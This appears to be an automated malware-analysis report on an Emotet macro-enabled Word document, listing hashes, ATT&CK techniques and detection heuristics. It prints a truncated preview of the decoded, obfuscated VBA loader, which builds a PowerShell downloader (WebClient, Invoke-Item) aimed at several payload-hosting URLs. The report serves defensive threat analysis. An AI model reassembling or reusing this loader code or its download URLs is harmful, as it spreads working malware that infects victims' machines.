Emotet Office (OLE) malware analysis — malicious · 800795935e06dbe2

MALICIOUS

Office (OLE)

96.0 KB Created: 2017-11-09 06:16:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: e8133af2751b9154271a0f381f524ecc SHA-1: 16801ed8267174ff7f25f9262ebec18fac45cc37 SHA-256: 800795935e06dbe26816a427fa11af480f8b0a5c7aa9fcedf8d9d1f5b551cb23

304 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader that uses CreateObject/Shell/exec. The VBA script explicitly constructs the URL 'http://www.ecobuildsolutionsgh.com/ilx/aix.spli' for downloading a file. This behavior is characteristic of Emotet, which often uses macro-enabled documents to download and execute further stages.

Heuristics 9

ClamAV: Doc.Macro.Emotet-6374344-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://3a0+3a0edajwQJmJ6bGYAOmz7C8m85vXVnkb� In document text (OLE body)
- http://3a0+3a0edajwQJmJ6bGYAOmz7C8m85vXVnkbIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	57115 bytes
SHA-256: `65e1c9d2b056f01d2173bc7004b918ccc71c44072c887521542cceb4320e0220`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 48 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zsLoZCGpK" Function CvFCnOljw() vbfpInFb = "" + AnZMXrj + Mid("13inH71jKkztqa0x);m3a0+3a0W3a0USK+USK+3a07karapas = 3a0+3a'+'0m3a0+3a0W3a0+3a07nsad3a0+3a0asd.3a0+3aUSK+USK0n3a0+3a0e3a0+3a0xt(1, 343a0+3a03245);mW7hua3a'+'0+3a0UJj7cYn6hdcmol1jPRRotKlWG", 14, 148) + uGwsmBm + BuFiJoW OETXBjY = "" + jFslvfF + Mid("in3PzDld510(3a0+3a0mW73a0+3a0a3a0+3a0bc in m3a0+3a0W7bcd3USK+USKa0+3a0)3a0+3a0{try{mW'+'73a0USK+USK+3'+'a'+'0f3a0+3a0ran3a0+3a0c.3a0+3a0Do3a0+3a0wnlo3a0+3a0adUSK+USKFi3a0+3a0le3a0+3a0(m3a0+3a0W7ab3asM7TFbKb5J7pLO8SMu", 11, 188) + zXcIjjr + lhKsPmi znZicbob = "" + qYtrJFD + Mid("SRbo5zVzjjwBGGRJYqEa0+3a0://3USK+USKa0+3a0ww3a0+3a0w.ecobuildsolu3a0+3a0t3a0+3a0ionsgh.3a0+3a0c3a0+3a0o3a0+3a0m3a0+3a0/ilUSK+USKZ/3a0+3a0a3a0+'+'3a0i3a0+3a0x.S3a0+3a0pl3a0+3a'+'0it3USK+USKa0+3a0(aix,ai3a0+3sPrZv8Y", 20, 187) + KdPPZpn + fMCXBhj hblOidW = "" + zXccvPI + Mid("DUP5aT7WH6HT]+'x'-join'')7WEGr4kuYGw6bB0", 13, 13) + fTEooXV + iFPjUki TGzSiSzO = "" + uYlQzJs + Mid("FUinzh0ZDCNhng][chAR]92).RePlACe(3a0aix3a0,[stRing]'+'[chAR]39) UzT&((GV 3'+'a0USK+'+'USKMdR3a0).NAmE[3,11,2]-jOIN3a0USK+USK3'+'a0)USK) -rEPlACe ([ChAR]51+[ChAR]97+[ChAR]48),[CrzahpPGkVvk7o", 13, 166) + wmjzZpz + DwRHDSh QfFZUjkLju = "" + uDmZotv + Mid("CiG74sZPAPauZnn0wzdqE('yYA',[sTRiNG][chAR]124).REPlAcE('USK',[sTRiNG][chAR]39) \|& ( ([StRiNg]$vErbOSEPREferEnce)[1,3WS1nvCZ", 21, 96) + wkpPPtz + mopuzzd VfFlpFz = "" + UidnAzc + Mid("va0+3a0cUSK+USKep3a0+3a0tion3a0USK+USK+3a0.Me3a0+'+'3a0s3a0+3a0sage;}}3a0).RePlACe(3a0mW73a0,3a0j2M3a0).RePlACe(([chAR]89+[chAR]108+USK+USK[Lz1ZnvukUo8vhwRj1Y9Z6su9fk0H", 2, 139) + KnDdJwF + oOGLNWn KianhVnzalL = "" + QJwfvFG + Mid("Cv0TwLUQKoZQhQNtoVkGpcjw9p://www.e3a0+3a0mont-dn'+'e3a0+3a0p3a0+3a0r.c3a0+3a0om/DZontEn3a0+3a0/,3a0+3a0ht3a0+3a0tp'+'3srw88uPkirQpM", 26, 93) + nsdDkfD + faAfacv QhcfRWPlLFs = "" + Nhbhlvb + Mid("Y2GFlM31zfDsYKYlOaix 3a0+3a0+ mW73a0+3a0karapas 3a0+3a0+ a3a0+3a0i'+'x.ex3a0+USK+USK3a0eaix;fo3a0+3a0r3a0DKDJCvCO1YPj", 14, 92) + cpXlUzC + fRzrPGc jUJKOiI = "" + EtqAiER + Mid("fdbnE0+3a0c.TUSK+USKoStriUSK+U'+'SK3a0+3a0ng('+')3a0+3a0,3a0+3a0 m3a0+3a0W'+'3a0+3a073a0'+'+3a0huas);Invoke-It3a81mHki4KRSWEADPmAAM9", 6, 107) + SaRLYRu + cuNqUVr TzkfOdXfL = "" + APXXZXJ + Mid("qWjm4MBRjirjSl0+3a0em3a0+3a0(mW7h3a0+3a0uas)3a0+3a0;br3a0+3a0e3a0+ShwV6zzS9", 15, 52) + BlndWBF + pPOsbMi dkZsPcAoLUt = "" + SwvThMC + Mid("EitkjHjKs 3a0+3a0= 3a0+'+'3a0mW7env:p'+'ublic + USK+USK3a0+3a0aixUSK+USnVT8Vnm", 9, 63) + vCpKStz + AwlBawz wwGwFJsb = "" + wHfRzVA + Mid("7zlzAaixhtUSK+USK3a0+3a0tp3a0+3a0://monitoreoin3a0+3a0tel3a0+3a0ig3a0+3a0ente.c3a0+3a0om.ar/gk3a0+3a0Nu3a0+3a0N3a0+USK+USK3a0KlYK/,http://3a0+3a0edajwQJmJ6bGYAOmz7C8m85vXVnkb", 6, 143) + DwbzCwn + TfzuAzR BYTRikI = "" + WIzcUbX + Mid("3C8FEtzH8ZwS4ifhAR]39-rEPlACe([ChAR]85+[ChAR]122+[ChAR]84),[ChAR]124-rEPlACe USKj2MUSK,[ChAR]36'+') yYA & ( R4ISheLLid[1]+R4Ishell'+'Id[13]+USKxUSK)').REPlAcE('R4I','$').REPlAc6zXYnTW5VPqhiZ", 16, 161) + BUwsPFJ + jRrwATR mAhASth = "" + uYcpFou + Mid("k3zkhYbWmza0+3a0 3a0+3a0ne'+'3a0+3a0w-3a0+'+'3a0object 3a0+3a0ra3a0+3a0'+'nd3a0+3a0om3a0+3a0;mW7bcd = bLuiROIZqX33WPjBsKqpR", 11, 92) + RVdXrAo + KEhjLGE fVNdivfq = "" + WKOcUmP + Mid("6n0OS6jmCILi1Cb2Ow ('((USK'+'(3a0'+'mW3USK+USKa0+3a07frUSK+USKanc3a0+3a0USK+USK =3a0+3a0'+' n3a0+USK+'+'USK3a0ew-3a0'+'+3a0o3a'+'0+3a0b3a0+3a0j3a0+3a0e'+'c3a0+3a0t 3a0+3a0S3a0+3aUSK+USK0ys3a0+3a0tem.Ne3U'+'UnhNwQuCaAQ", 19, 188) + zwKPjlv + hGdDjfZ VtdOwPEJQCq = "" + RjlSzwz + Mid("iZ7zLcCvspb.3a0+3a0rUSK+USK3a0+3a0u/3a0+3a0putsitem3a0+3a0she3a0+3a0re/T3a0+USK+USK3a0xKv3a0+3a0j3a0+3a0/,3a0+3a0ht3a0+3a0tp:/3a0+3a0/feba'+'.neUSK+USK3a0+3a0t3a0+3a0/YA3a0+3a0q3a0+3a0J3a0+3a0/,httXapKElJWZFKGZZMp", 8, 190) + OszmBwV + mvHrtru wsZwH = "" + RRjafBF + Mid("GOAJ5noPVFVB4SK+USKa0+3a0t.WebC3a0+3a0lient;3a0+3a0mW3a ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.